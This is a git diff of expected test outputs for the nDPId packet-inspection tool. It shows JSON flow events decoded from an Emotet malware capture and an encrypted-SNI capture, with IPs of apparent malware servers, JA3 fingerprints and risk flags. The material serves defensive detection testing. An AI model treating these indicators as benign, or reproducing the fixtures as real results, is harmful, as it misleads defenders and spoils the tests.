{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01468{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2233,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905467542,"flow_last_seen":1650905467789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1378,"flow_tot_l4_payload_len":1527,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1650905467789,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"ec74a5c51106f0419184d0dd08fb05bc","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","subjectDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","fingerprint":"43:A2:39:73:AC:4D:2C:15:7B:D6:4E:32:EA:22:11:B7:97:65:1A:93"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2359,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650905469778,"flow_last_seen":1650905469778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650905469778,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2359,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1650905469778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905469778,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0C9hAAIAGrVgKBBllisWTZcKMAbv+vEuFAAAAAIAC\/\/8e8wAAAgQFtAEDAwgBAQQC"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2360,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1650905469855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905469855,"pkt":"AAgCHEeuIOUqtpPxCABFAAA0AABAADAGCTGKxZNlCgQZZQG7woy1bvT7\/rxLhoAS+vB5zwAAAgQFbAEBBAIBAwMH"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2361,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1650905469855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650905469855,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoC9lAAIAGrWMKBBllisWTZcKMAbv+vEuGtW70\/FAQBACxSgAAAAAAAAAA"} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905469778,"flow_last_seen":1650905469856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1650905469856,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2364,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905469778,"flow_last_seen":1650905469964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1650905469964,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":564,"flow_first_seen":1650905413858,"flow_last_seen":1650905415845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":544468,"flow_avg_l4_payload_len":965,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -01027{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":136,"flow_first_seen":1650905467542,"flow_last_seen":1650905495928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":96457,"flow_avg_l4_payload_len":709,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1650905469778,"flow_last_seen":1650905518385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":2380,"packets-processed":2380,"total-skipped-flows":0,"total-l4-payload-len":1995225,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1650905518385} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905469778,"flow_last_seen":1650905469856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1650905469856,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2364,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905469778,"flow_last_seen":1650905469964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":325,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1650905469964,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00924{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":564,"flow_first_seen":1650905413858,"flow_last_seen":1650905415845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":544468,"flow_avg_l4_payload_len":965,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +01027{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":136,"flow_first_seen":1650905467542,"flow_last_seen":1650905495928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":96457,"flow_avg_l4_payload_len":709,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1650905469778,"flow_last_seen":1650905518385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1650905518385,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2380,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":2380,"packets-processed":2380,"total-skipped-flows":0,"total-l4-payload-len":1995225,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":46,"global_ts_msec":1650905518385} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2380/2380 ~~ skipped flows.............: 0 @@ -53,9 +52,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5950633 bytes -~~ total memory freed........: 5950633 bytes -~~ total allocations/frees...: 120536/120536 +~~ total memory allocated....: 6084247 bytes +~~ total memory freed........: 6084247 bytes +~~ total allocations/frees...: 123297/123297 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 1473 chars diff --git a/test/results/encrypted_sni.pcap.out b/test/results/encrypted_sni.pcap.out index f5d1d1596..95610d5b1 100644 --- a/test/results/encrypted_sni.pcap.out +++ b/test/results/encrypted_sni.pcap.out @@ -2,13 +2,13 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCL